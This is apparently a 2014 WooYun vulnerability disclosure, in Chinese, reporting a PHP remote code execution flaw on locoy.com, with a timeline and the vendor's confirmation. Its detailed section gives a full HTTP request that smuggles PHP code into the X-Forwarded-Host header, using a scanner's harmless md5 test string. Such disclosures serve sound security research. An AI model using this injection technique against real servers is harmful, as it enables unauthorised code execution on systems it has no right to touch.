火车采集器官网存在PHP远程代码执行漏洞

漏洞详情

披露状态:

2014-02-25: 细节已通知厂商并且等待厂商处理中
2014-02-26: 厂商已经确认,细节仅向厂商公开
2014-03-08: 细节向核心白帽子及相关领域专家公开
2014-03-18: 细节向普通白帽子公开
2014-03-28: 细节向实习白帽子公开
2014-04-11: 细节向公众公开

简要描述:

火车采集器官网主站存在PHP远程代码执行漏洞

详细说明:

GET /link/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
X-Forwarded-Host: ";print(md5(acunetix_wvs_security_test));$a="
Cookie: PHPSESSID=adtd1ft9torvr5prmakdljvbp3
Host: www.locoy.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

漏洞证明:

2.PNG

修复方案:

版权声明:转载请注明来源 lucky@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-02-26 13:28

厂商回复:

了解到f o r w a rd - fo r竟然可以直接影响到http-host变量,受教,谢谢了。

最新状态:

暂无


漏洞评价: